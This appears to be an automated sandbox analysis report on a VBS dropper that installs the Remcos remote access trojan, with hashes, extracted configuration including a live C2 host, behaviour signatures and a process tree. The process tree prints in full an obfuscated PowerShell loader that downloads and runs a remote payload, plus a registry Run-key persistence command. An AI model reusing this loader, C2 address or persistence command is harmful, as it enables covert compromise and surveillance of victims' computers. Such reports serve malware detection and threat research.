Overview

overview

10

Static

static

1

8c44a141ad...08.vbs

windows7-x64

10

8c44a141ad...08.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    28-11-2024 03:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8c44a141ad79f060aa0f3569417620f454dfc96f27c769a3f7f043dc208bff08.vbs

  • Size

    33KB

  • MD5

    874b7c74ba70048322868f15101e716f

  • SHA1

    2bff6a5d0d550508cea89b84b11751d47ac3354b

  • SHA256

    8c44a141ad79f060aa0f3569417620f454dfc96f27c769a3f7f043dc208bff08

  • SHA512

    5d0e93ed6b8f9a6a9405f0c9932c3310226b7d50d28719f0b53e5b6b81bd3fb981f9deb4c966a67a8e290f532c64c174ea90b1b2133628948272e7572cbb3c80

  • SSDEEP

    768:9GfasXAuuTDKOp7p65M04NKzGqhZrvGU8hLVVnO0rP6oahTd:QfasqT+665qMGq/rgxO0KD

Score
10/10
remcosremotehostdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8c44a141ad79f060aa0f3569417620f454dfc96f27c769a3f7f043dc208bff08.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Nonelementally='Tyees';;$Rewrote='Stykstrrelsen';;$Preponderance='Swotting';;$Spadicose='Overcasts';;$Forseek='Politiarbejde';;$neurospasm=$host.Name;function Tariflns($Undisastrously){If ($neurospasm) {$eukalyptusoliernes=4} for ($Packly=$eukalyptusoliernes;;$Packly+=5){if(!$Undisastrously[$Packly]) { break }$velarernes+=$Undisastrously[$Packly]}$velarernes}function Thorvil($Demarkssamfundets){ .($Agists) ($Demarkssamfundets)}$Fourageringens=Tariflns ' inrn ForeSolft iag.Gug WUna E AlgBmenicPerolIncoiGrotEBogsNS,otT';$Tungekantens=Tariflns 'Bib MFarvo odozForhiGranlShorlSnowaOmro/';$Gevaldigeres=Tariflns 'TyktTO,tal k msComi1Sner2';$Saltmandlen=' B s[UncoN paaEAfgitLiba.NonaSFloseHemarH,geVD,seIUnmyCChile oulPCurlOUdsgiMac nSkaftTaiwMSalgaDeviNvelsA eadGBentESurhrflle] Sub:Auto:B.vusH ckE koCmiljU EstrPodaI erit S.nySar.PRefeR FraoSemitFornO M cCInteoFruglFono=,amp$Hov.G E seeftevKaloaSpralDiseD R eiMuncGPriseNeg.RKoniEcrums';$Tungekantens+=Tariflns ' M.g5Trun.Varm0Lori Pone( proW Ma.iDes n BerdStinoUroew MedsN nf PerfN ogiT Sha Reou1Gede0 Fak.vask0Ald,; Vi Tri W Po i ekon O.e6 idd4 udd; mat Savbx ran6Part4Exil;Alex KlaprPlagv.all:Vit 1ruth3port1Chab.proc0Walt) Mul AfstGbogkeSyllcMdelkDeoxoOrga/Iono2genm0Spol1Educ0 nhi0 Skr1Agur0Donk1Plan quarFS kti Nonr,hukeBlomf Varomejsx.onc/Lady1Agat3Pebe1 .am.Disi0';$Retractors=Tariflns 'DemauSmreSSu.ce,andRSku - ykkAAftrgSemiEVippnGlyct';$Brigandine=Tariflns 'LagnhKirst LaktCapep SyssSp,y:Afle/ Ud /SynkdFictrhumaiFodbvRegue .nd.AffagGnatoblg oTabbgK.rulExereBo e.Unplc ehnoAnormO er/InvauGirocbare?Ho.neRhinxViripTerroUnderRbd tKlem=KolldMedfoBnhrw Udan Refl UnloIntha NeadRedd&F,nki JobdProg= S,l1 DatcFang2MadepChalnweasUAfbicSw.evfiarM AccA Alc1 VelSMargHFor,U on9Mura0DiveMS,deNStatATu eUCorph,lynE PrefMedi6NongSflamHPos iKollLUdslDP ovTStalHOcta- Co.s';$Administrere=Tariflns 'Pill>';$Agists=Tariflns 'Br.diUdfaeGyp x';$Saftningen0='Multispecies';$Viceborgmestrene='\Statsbesgene106.Phy';Thorvil (Tariflns ' ans$IndsG br,lLi loClinBTvana S llMind:StomLNonagAlleE JorPMisflVandAIndvN ristOp oEBaglRalte1 Enc3S.dt2,sso=Ded $W,goePardnO,erVOocy: Al.a eekP TrgP aldUkldAHjemt Dema,nco+extr$ F.eV StoI C.ec S lEIndfbDsleoCwo r E tgTilsMudmuE marsdebatPladR EnhE BecnEi.tE');Thorvil (Tariflns 'Trn,$nlbjGRec.l TriOPo ubUlemaOve l App: PerMSpiril kes Go,DBeauaMissnbedsnSagleFor.LPa,lS Vide NonRSol,Slu.r=Trus$WaagBOv rRObstI ResgBjeraFlopnDi,kdPre,iTeksNSak E .ry.I itS elfP HalL UdbI Udgt Fre(Fisk$Aucta NotdModtm,iftiCarcnLasti ForSBeattStedr Un EOrgarTo reNeig)');Thorvil (Tariflns $Saltmandlen);$Brigandine=$Misdannelsers[0];$Forsultnes=(Tariflns 'Sl.o$incog PrelUnaroCryaB olfA F.rLF rh:opklSHjerOOv,raTh rP BruERastrDuk ySkuf=DejeN HosEPippWPulm-Lig oMinbbU skjInveEPen,COkseTOn m SproSBje Y vddSWastTaf oeGenuMUnsa.Out.$ Stef ,aroArisUSmugR onASongG .haeL,geRyou IAcetNAfs.G AuteRestnVestS');Thorvil ($Forsultnes);Thorvil (Tariflns 'Mark$S ltS AntoUnsaaformp .tieEmberBetrybrug. RegHretieRhaba PredCogie .olrPre sVigt[Rea $O.lfRNonlePurgtBewarM.tiaSkalcRheutPossoSemerKroes ko]Gede=Sols$Pho T eliusysln .opgTrepe GrakTaruaImmunPalotFleleT.nnnNubis');$Togetheriness107=Tariflns 'depl$StabS OveoJensaTi,upCleaeTranr PyoyFrem.fa.eDSprnoOverwKul,nSloglRokkoAt raOpr dErhvFArthiNo dlM sfeUncr(Lang$ LedBGidsrTobiiUnu gOrthaBordnRetsd StriPrednForge nai,Prec$RadiSJ.zzcLavla Su lKernesemib,ronaTerirPlotkT,le)';$Scalebark=$Lgeplanter132;Thorvil (Tariflns ' one$Besgg L.tLFrugoRuskbTr.vaChunLFag :missC Al eHorenRkn.TBrydrSekraFr gl FedBProtIMi,sbLsekL S oiOceao mfotP.ogeFiloKF rgemi.fTU.mysW ll=Imar( natS ileStdeSBes T.onf-Ind PBlitA,efaTFantHWadd Hy $StemSVapocCompaRynklGebreOrn BPrioASociR Felk Lab)');while (!$centralbibliotekets) {Thorvil (Tariflns ' Flg$Ta rgReall Bilo,aanbUnstaEterlBode:leucT evieL vemB rkpPlasrCribebagvl .teyKast=V rk$HuskA lehmBandpRe cuSyntlGenns') ;Thorvil $Togetheriness107;Thorvil (Tariflns 'SlanS oadtMi iASkanR IontNomi- ReisDevilFlytePas e Te,PTins U oe4');Thorvil (Tariflns ' ink$ ,hegSimplRefrO Absb ,yta ExcLDrve: SelC rcieDezinNon TM.tor ArkAAfsplA ndBDefrISa tBmet L koliRygeo oqt StoeOospKBurge,dvaT B as U d=Nitr(.esmt upeeVognShusmT Civ-Ar.hPBohea Va,TD reh Dec .oca$S ilS CruCMiljA K jl MoteOmp B onAUnderAfdeKTra )') ;Thorvil (Tariflns ',rdr$Provg CybLButtOaf,ebRingaEff LOver:,naibvo olFordO .anMBagas Falt Ly ESlvtrSt ff SanOHun rPropR Raae Knit K.mNUnadi plNMicrgPseuEFunkNSanc=flle$ AfrGTestlDoneOManiBPlowaMa tlusol:B muAGaliabillRAn.aGPrioASkr.NRoeng O.dsAnmov M riCognN MysEBau 1,ool6 Civ9Elod+Kamm+Bisi% Syn$EndomS itI lumsSam.d DrvAMelin S rNBla eWhitLPrluSAn eE strrKiniSLoka.ElecCSelvO M.ruPeppNGallt') ;$Brigandine=$Misdannelsers[$Blomsterforretningen]}$Anbruddet=293276;$Bitterens78=29815;Thorvil (Tariflns ' Tid$HillGDejtL eccoKr.ebSpekA rolLFilo: GlaS SenTH,beU LinrIff,DUrtei,eliEKuffrFjelSPaafTUnmauC okrMensDFilmIManiEs ldsButt Kin=file T aGT,noeDeagTR.ex-A.isCDireOTebrn,arnTCaliEVejlNTenoTSuns Uns$E,izsma,bcmediATaleLAnveEGraabMingaj ngrCoquk');Thorvil (Tariflns 'lat $G,adgBrndlAntio deebAutoaPonylReb :CumqSGalip HanrEnsieN naeRonguhemewStje Trus=Su e Vag[ LagSglo,yS,rbsTaxitTidee.quim Dag.P,vlC To.oOvernPacovf omeHjtrrWeentRing] Hup:.aga:ChabFNoner uncoUnn mTankB Hera lefsNonee S.u6fims4,isaSPor.tSu.mrForbiUnvinKodegroen( oni$Ge,eSFst t ConuUfo rTromdFugliRo keAandrGlads.vint sotuSlanr EvedInveiRea ef essHgrn)');Thorvil (Tariflns 'Snoo$,eomG S nl,aanODagvb HydAKe.rlGud :Til,FAnkeOToldrEnectSummy oncSBoscKOplsEPyr.nSupedLrene Inf9 The4G nt acr =Ha t T ll[ BurSSt,vYBronSSideTSomaE PreMMetr.SeisT Ao,e ysXPaakTArk .craceUncrnViolcSponoUdstdQue iKissnKar,g Had]Came:An.a: StoAlockS Re cbrddiStv IMe,i.MoragEpi.e E sT Swes LusTJappR undiLn.unTjenGBund( ,ot$ConfsChriP ,isrf.rkeDipnECuteU Lgpwex e)');Thorvil (Tariflns ' Phe$UnhyGIldsLThorO Grobbeg.AOverLSulf:FyrsANoecd M aSSelvPBet RButteUnred SlaEBamalF rcs ,rkE VkkRFjen2Lead3snac5 .aa=Stav$UmbrF.kspoA,leR luetAutoyBal.sNavik SanERutsNOr hDSt,gEIsln9Fint4Spha.piprs.topUMultbAmbaSTvistFotorNstvI S jn S,oGWebs(sols$ ninABelyNSterbForbr B oURa.kdnutwDD nseHybrtHo a, Fre$ArabBSammiDouctLodsTMicrePlasrBisteSpaanUafhs t o7Re u8 Kvi)');Thorvil $Adspredelser235;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2504
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Nonelementally='Tyees';;$Rewrote='Stykstrrelsen';;$Preponderance='Swotting';;$Spadicose='Overcasts';;$Forseek='Politiarbejde';;$neurospasm=$host.Name;function Tariflns($Undisastrously){If ($neurospasm) {$eukalyptusoliernes=4} for ($Packly=$eukalyptusoliernes;;$Packly+=5){if(!$Undisastrously[$Packly]) { break }$velarernes+=$Undisastrously[$Packly]}$velarernes}function Thorvil($Demarkssamfundets){ .($Agists) ($Demarkssamfundets)}$Fourageringens=Tariflns ' inrn ForeSolft iag.Gug WUna E AlgBmenicPerolIncoiGrotEBogsNS,otT';$Tungekantens=Tariflns 'Bib MFarvo odozForhiGranlShorlSnowaOmro/';$Gevaldigeres=Tariflns 'TyktTO,tal k msComi1Sner2';$Saltmandlen=' B s[UncoN paaEAfgitLiba.NonaSFloseHemarH,geVD,seIUnmyCChile oulPCurlOUdsgiMac nSkaftTaiwMSalgaDeviNvelsA eadGBentESurhrflle] Sub:Auto:B.vusH ckE koCmiljU EstrPodaI erit S.nySar.PRefeR FraoSemitFornO M cCInteoFruglFono=,amp$Hov.G E seeftevKaloaSpralDiseD R eiMuncGPriseNeg.RKoniEcrums';$Tungekantens+=Tariflns ' M.g5Trun.Varm0Lori Pone( proW Ma.iDes n BerdStinoUroew MedsN nf PerfN ogiT Sha Reou1Gede0 Fak.vask0Ald,; Vi Tri W Po i ekon O.e6 idd4 udd; mat Savbx ran6Part4Exil;Alex KlaprPlagv.all:Vit 1ruth3port1Chab.proc0Walt) Mul AfstGbogkeSyllcMdelkDeoxoOrga/Iono2genm0Spol1Educ0 nhi0 Skr1Agur0Donk1Plan quarFS kti Nonr,hukeBlomf Varomejsx.onc/Lady1Agat3Pebe1 .am.Disi0';$Retractors=Tariflns 'DemauSmreSSu.ce,andRSku - ykkAAftrgSemiEVippnGlyct';$Brigandine=Tariflns 'LagnhKirst LaktCapep SyssSp,y:Afle/ Ud /SynkdFictrhumaiFodbvRegue .nd.AffagGnatoblg oTabbgK.rulExereBo e.Unplc ehnoAnormO er/InvauGirocbare?Ho.neRhinxViripTerroUnderRbd tKlem=KolldMedfoBnhrw Udan Refl UnloIntha NeadRedd&F,nki JobdProg= S,l1 DatcFang2MadepChalnweasUAfbicSw.evfiarM AccA Alc1 VelSMargHFor,U on9Mura0DiveMS,deNStatATu eUCorph,lynE PrefMedi6NongSflamHPos iKollLUdslDP ovTStalHOcta- Co.s';$Administrere=Tariflns 'Pill>';$Agists=Tariflns 'Br.diUdfaeGyp x';$Saftningen0='Multispecies';$Viceborgmestrene='\Statsbesgene106.Phy';Thorvil (Tariflns ' ans$IndsG br,lLi loClinBTvana S llMind:StomLNonagAlleE JorPMisflVandAIndvN ristOp oEBaglRalte1 Enc3S.dt2,sso=Ded $W,goePardnO,erVOocy: Al.a eekP TrgP aldUkldAHjemt Dema,nco+extr$ F.eV StoI C.ec S lEIndfbDsleoCwo r E tgTilsMudmuE marsdebatPladR EnhE BecnEi.tE');Thorvil (Tariflns 'Trn,$nlbjGRec.l TriOPo ubUlemaOve l App: PerMSpiril kes Go,DBeauaMissnbedsnSagleFor.LPa,lS Vide NonRSol,Slu.r=Trus$WaagBOv rRObstI ResgBjeraFlopnDi,kdPre,iTeksNSak E .ry.I itS elfP HalL UdbI Udgt Fre(Fisk$Aucta NotdModtm,iftiCarcnLasti ForSBeattStedr Un EOrgarTo reNeig)');Thorvil (Tariflns $Saltmandlen);$Brigandine=$Misdannelsers[0];$Forsultnes=(Tariflns 'Sl.o$incog PrelUnaroCryaB olfA F.rLF rh:opklSHjerOOv,raTh rP BruERastrDuk ySkuf=DejeN HosEPippWPulm-Lig oMinbbU skjInveEPen,COkseTOn m SproSBje Y vddSWastTaf oeGenuMUnsa.Out.$ Stef ,aroArisUSmugR onASongG .haeL,geRyou IAcetNAfs.G AuteRestnVestS');Thorvil ($Forsultnes);Thorvil (Tariflns 'Mark$S ltS AntoUnsaaformp .tieEmberBetrybrug. RegHretieRhaba PredCogie .olrPre sVigt[Rea $O.lfRNonlePurgtBewarM.tiaSkalcRheutPossoSemerKroes ko]Gede=Sols$Pho T eliusysln .opgTrepe GrakTaruaImmunPalotFleleT.nnnNubis');$Togetheriness107=Tariflns 'depl$StabS OveoJensaTi,upCleaeTranr PyoyFrem.fa.eDSprnoOverwKul,nSloglRokkoAt raOpr dErhvFArthiNo dlM sfeUncr(Lang$ LedBGidsrTobiiUnu gOrthaBordnRetsd StriPrednForge nai,Prec$RadiSJ.zzcLavla Su lKernesemib,ronaTerirPlotkT,le)';$Scalebark=$Lgeplanter132;Thorvil (Tariflns ' one$Besgg L.tLFrugoRuskbTr.vaChunLFag :missC Al eHorenRkn.TBrydrSekraFr gl FedBProtIMi,sbLsekL S oiOceao mfotP.ogeFiloKF rgemi.fTU.mysW ll=Imar( natS ileStdeSBes T.onf-Ind PBlitA,efaTFantHWadd Hy $StemSVapocCompaRynklGebreOrn BPrioASociR Felk Lab)');while (!$centralbibliotekets) {Thorvil (Tariflns ' Flg$Ta rgReall Bilo,aanbUnstaEterlBode:leucT evieL vemB rkpPlasrCribebagvl .teyKast=V rk$HuskA lehmBandpRe cuSyntlGenns') ;Thorvil $Togetheriness107;Thorvil (Tariflns 'SlanS oadtMi iASkanR IontNomi- ReisDevilFlytePas e Te,PTins U oe4');Thorvil (Tariflns ' ink$ ,hegSimplRefrO Absb ,yta ExcLDrve: SelC rcieDezinNon TM.tor ArkAAfsplA ndBDefrISa tBmet L koliRygeo oqt StoeOospKBurge,dvaT B as U d=Nitr(.esmt upeeVognShusmT Civ-Ar.hPBohea Va,TD reh Dec .oca$S ilS CruCMiljA K jl MoteOmp B onAUnderAfdeKTra )') ;Thorvil (Tariflns ',rdr$Provg CybLButtOaf,ebRingaEff LOver:,naibvo olFordO .anMBagas Falt Ly ESlvtrSt ff SanOHun rPropR Raae Knit K.mNUnadi plNMicrgPseuEFunkNSanc=flle$ AfrGTestlDoneOManiBPlowaMa tlusol:B muAGaliabillRAn.aGPrioASkr.NRoeng O.dsAnmov M riCognN MysEBau 1,ool6 Civ9Elod+Kamm+Bisi% Syn$EndomS itI lumsSam.d DrvAMelin S rNBla eWhitLPrluSAn eE strrKiniSLoka.ElecCSelvO M.ruPeppNGallt') ;$Brigandine=$Misdannelsers[$Blomsterforretningen]}$Anbruddet=293276;$Bitterens78=29815;Thorvil (Tariflns ' Tid$HillGDejtL eccoKr.ebSpekA rolLFilo: GlaS SenTH,beU LinrIff,DUrtei,eliEKuffrFjelSPaafTUnmauC okrMensDFilmIManiEs ldsButt Kin=file T aGT,noeDeagTR.ex-A.isCDireOTebrn,arnTCaliEVejlNTenoTSuns Uns$E,izsma,bcmediATaleLAnveEGraabMingaj ngrCoquk');Thorvil (Tariflns 'lat $G,adgBrndlAntio deebAutoaPonylReb :CumqSGalip HanrEnsieN naeRonguhemewStje Trus=Su e Vag[ LagSglo,yS,rbsTaxitTidee.quim Dag.P,vlC To.oOvernPacovf omeHjtrrWeentRing] Hup:.aga:ChabFNoner uncoUnn mTankB Hera lefsNonee S.u6fims4,isaSPor.tSu.mrForbiUnvinKodegroen( oni$Ge,eSFst t ConuUfo rTromdFugliRo keAandrGlads.vint sotuSlanr EvedInveiRea ef essHgrn)');Thorvil (Tariflns 'Snoo$,eomG S nl,aanODagvb HydAKe.rlGud :Til,FAnkeOToldrEnectSummy oncSBoscKOplsEPyr.nSupedLrene Inf9 The4G nt acr =Ha t T ll[ BurSSt,vYBronSSideTSomaE PreMMetr.SeisT Ao,e ysXPaakTArk .craceUncrnViolcSponoUdstdQue iKissnKar,g Had]Came:An.a: StoAlockS Re cbrddiStv IMe,i.MoragEpi.e E sT Swes LusTJappR undiLn.unTjenGBund( ,ot$ConfsChriP ,isrf.rkeDipnECuteU Lgpwex e)');Thorvil (Tariflns ' Phe$UnhyGIldsLThorO Grobbeg.AOverLSulf:FyrsANoecd M aSSelvPBet RButteUnred SlaEBamalF rcs ,rkE VkkRFjen2Lead3snac5 .aa=Stav$UmbrF.kspoA,leR luetAutoyBal.sNavik SanERutsNOr hDSt,gEIsln9Fint4Spha.piprs.topUMultbAmbaSTvistFotorNstvI S jn S,oGWebs(sols$ ninABelyNSterbForbr B oURa.kdnutwDD nseHybrtHo a, Fre$ArabBSammiDouctLodsTMicrePlasrBisteSpaanUafhs t o7Re u8 Kvi)');Thorvil $Adspredelser235;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2996
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Fjervgtsbokserne% -windowstyle 1 $Aktiveringers=(gp -Path 'HKCU:\Software\Wanhappy69\').Inexhaustibility;%Fjervgtsbokserne% ($Aktiveringers)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2596
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Fjervgtsbokserne% -windowstyle 1 $Aktiveringers=(gp -Path 'HKCU:\Software\Wanhappy69\').Inexhaustibility;%Fjervgtsbokserne% ($Aktiveringers)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1864

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    ab8e9902e6130b2439e824ada6c57628

    SHA1

    0e76a2e1ac399d4ae8c5037217d6f1edbd339d85

    SHA256

    a61e67d48ce549894813bbc2b94cc95f1ba52447d04213a3047212a906e16c13

    SHA512

    928ff7c03d5bb1ccce4c310562d10d726449b7aae572a591529df09833921b373284c1d3ad033565ee6d72846e92e94e1fa0ac93d7a8b1a12181dde01cdb54d2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabB389.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar3E68.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SVZGI8XQM36TBGGUQGIL.temp
    Filesize

    7KB

    MD5

    3f700b4278ce0380eafdb441b99f557c

    SHA1

    3412af706162f6a9c36fde0ba70e14c27e71325f

    SHA256

    71ece6d24412e9f62d21af19ab97ae66ecd27676d567a23bcb3b98feb99d3d9f

    SHA512

    eb72da4dd14f0cbcd993928ddd51d6bff5ec11cdc8a8aef587b76f70b76e9b513f05ba684cf14bfbc2425a5f47c8b38cd429b82de3d1535bb7904b0141f64453

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Statsbesgene106.Phy
    Filesize

    420KB

    MD5

    4852e2df1d1accc2d4f47cb70f10cd3f

    SHA1

    19f7099a425f9347297b3180a0885bd679efdcab

    SHA256

    84baba15ce108aad9f54b9192f920e2ef9497eb467037e4f7d1aba3a99c190b9

    SHA512

    57e0d157436b2b91d97b504fd27ff445387ade44b8dd9fec1e6dc9066552ef97e2556f75bfa3847778bf770bf1b8ab653e2cdaa52c1e5cc83d78388c74af8de8

    Download Submit

  • memory/2140-64-0x0000000000540000-0x00000000015A2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2140-61-0x0000000000540000-0x00000000015A2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2140-56-0x0000000000540000-0x00000000015A2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2504-24-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2504-29-0x000007FEF58EE000-0x000007FEF58EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2504-30-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2504-32-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2504-27-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2504-26-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2504-25-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2504-23-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2504-21-0x000000001B5B0000-0x000000001B892000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2504-22-0x0000000001D90000-0x0000000001D98000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2504-20-0x000007FEF58EE000-0x000007FEF58EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2996-36-0x00000000065F0000-0x00000000083B0000-memory.dmp

    Filesize

    29.8MB

    Download